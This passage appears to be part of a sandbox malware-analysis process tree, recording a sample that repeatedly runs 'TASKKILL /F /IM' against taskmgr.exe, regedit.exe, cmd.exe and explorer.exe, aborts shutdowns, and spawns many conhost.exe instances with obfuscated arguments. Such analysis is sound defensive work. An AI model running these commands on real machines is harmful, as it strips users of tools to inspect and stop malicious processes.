      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2432
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2320
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2088
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1384
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:992
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:828
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1880
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:548
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2008
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2976
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1284
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:924
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1528
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2336
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:1748
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1692
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:596
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2500
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2904
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2824
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1020
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2844
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2804
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2020
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2216
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:2828
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1964
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:3032
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2784
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2196
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2616
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:668
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2180
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1188
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1540
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:568
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:1532
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1768
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1520
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1000
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1288
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2936
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2052
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:2384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:740
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2576
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2320
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:112
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:968
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:1868
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1892
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1612
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1648
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2976
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2188
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2312
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1716
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2064
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1332
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1144
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:2072
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1692
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1584
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1580
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2964
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2896
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2096
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:340
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:2844
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2692
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1952
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2372
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2284
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:3032
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1500
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2608
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2528
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:560
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2992
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:1104
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1540
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:892
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1976
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1392
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1252
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2780
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2764
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2112
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2556
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1732
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2252
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2640
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:652
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:592
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1328
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1992
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2792
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1872
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2424
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:548
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2260
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2752
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2368
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2136
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2128
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:984
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1544
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2084
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2580
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1988
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2460
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1448
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:2972
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2960
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:2968
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2952
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2712
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2380
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1672
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2696
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2688
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2020
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:1968
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:2600
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2356
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2720
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2816
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2924
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:756
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1188
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:568
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1568
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1596
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:1520
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2812
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1836
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2264
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:1780
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2732
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2576
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2348
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2252
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:940
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:652
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2676

C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1273109212413799586-1398714111-21161310671038174917-298085371-958939610415101171"
1⤵
PID:2372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6271262381135786589-10020901501427587492317275495428493308-538860489-1294789478"
1⤵
PID:2216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "122884249324546582327097929-3815228872044357521305365647-1575775932664448457"
1⤵
PID:2784

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18860674211097146126517962844-1916393154466293677-1091394839584728593-1472784889"
1⤵
PID:2180

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3477828321178462369-1165628992-1334144030-614294266-1102798188-152899484973138199"
1⤵
PID:3012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1489236888-95056820-7653752771496816880-1529179247-767093350-2017178224-324002215"
1⤵
PID:1488

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-184765054218183926431753973509-147326461347539554249459558-360828799109249988"
1⤵
PID:1148

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "357419345-537919080-3720648571228794822-1253285941-1286979759-14204378242104653154"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1545580098-1646780426-804411918128708946-1194979538589920428-1699853559687803622"
1⤵
PID:2396

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "244020258-95313799918793263921984665135-492432112-1110836874846683823303700736"
1⤵
PID:740

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-52129272033051886317401688302011122-1827204291-15669239781115266851743811094"
1⤵
PID:2320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-803366267-1624386068-14722275521334409435-9327792411712368716-5079215881229680436"
1⤵
PID:992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17011800611603323631-17040635201957101189-1845426098-1029962025-1279118253631139444"
1⤵
PID:1860

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-278546692-1362534906370534573-1389082906588896787601865278614178211561165407"
1⤵
PID:2976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1416455674-627660685-271429757432325465231057679829053181099921097-501769484"
1⤵
PID:2376

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-173102917-1040696209-1976768179-936175994-1367754815-1344204149-552454328624801038"
1⤵
PID:760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1642814499-794006593916907533897099315-409140794-1643665546-11034996141082441745"
1⤵
PID:1400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-149656240432151280138014720128439768298075736-1306103726-2089821330-488425168"
1⤵
PID:1252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10909652881987434125-1182431762-745151046550508127-18462099082143209936-1555910804"
1⤵
PID:1120

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10673266382307957881409250273901746668-1623572158162407338020183411892021985628"
1⤵
PID:2604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1878516685-1987162702-1852639565-756555275-477796470-7519119583873881331588278672"
1⤵
PID:2324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13092478951062640032-65557769712814078954269403-1371622732-1976426885-1516166861"
1⤵
PID:2376

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1922144343-13008960931538425000-1056283300-1713319481-1410511534-238485593-803634101"
1⤵
PID:1516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-219221379328460762-12290533224758422641152853367-497048519-18305217361256240629"
1⤵
PID:1880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19942412086412664971335806338-13844695471246842924-8092351461590959391-1782409543"
1⤵
PID:2008

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "55262324-986813858-13833409022117012745-20414254611506495799522969922-1293940179"
1⤵
PID:1284

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "812800760-1825990154408560704-4559932779788986342039028657-11571529881713194106"
1⤵
PID:2268

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19344319664040885637235142325007438124625682627477815061529395028-1808875230"
1⤵
PID:2336

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1969806367-995976631-1363031625-2106015240-852392864-776749822-1829235689517820582"
1⤵
PID:1748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15164457621985855560-14486893741889208701-1930808676-8805364711701096658-1793168598"
1⤵
PID:2904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1648640476429945875-12034872519364452391645323318-3317486821863959565-193325102"
1⤵
PID:1340

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1681888991-1095974141-521046052847401491699771125-624372960634111614-2110173420"
1⤵
PID:736

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-24615883717952101259636524-1791291841-1765901381-20774383901897304792-930685151"
1⤵
PID:956

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "13105316061260855224-154330040151970045-493084013-1044681049-1457658492-261807293"
1⤵
PID:924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1815078041-1656473928-1458593955-1457189398804427409-1906793008-1573435993-1558305127"
1⤵
PID:812

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "395601389420949707833805775-322251777-1103682085-12237482481103655469-1736172478"
1⤵
PID:1528

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1892873874-879219540-141773749-135982175586138827098496256-845549219-851333846"
1⤵
